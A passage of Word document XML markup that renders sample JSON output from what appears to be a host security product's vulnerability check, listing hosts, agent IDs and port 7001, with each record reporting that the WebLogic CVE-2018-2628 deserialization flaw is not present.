        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"7001"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"f7869518b8e84865"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.hostnam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localhost.localdomain</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host.hasDeleted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>trimmed_fields</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</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host.agentStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w: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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"192.168.146.131"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>data.ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"127.0.0.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ata.vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"不存在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2018-2628 反序列化漏洞"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"192.168.167.132"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.hostTagList</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ca89225d8915cedfee156"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w: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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"server-4"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>tagColor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"#FF00FF"</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host.assetLevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>data.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"7001"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"8ed75611c5014865"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.hostnam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localhost.localdomain</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host.hasDeleted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w: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_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>trimmed_fields</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</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host.agentStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w: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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"192.168.167.132"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>data.ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"127.0.0.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ata.vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"不存在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2018-2628 反序列化漏洞"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"172.16.5.102"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.hostTagList</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host.assetLevel</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data.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"7001"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"3bf67e5c8d8e1865"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.hostname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"zbx.qingteng.cn"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.hasDeleted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w: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_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>trimmed_fields</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</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host.agentStatus</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host.displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"172.16.5.102"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>data.ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"127.0.0.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ata.vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"不存在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2018-2628 反序列化漏洞"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"192.168.146.136"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
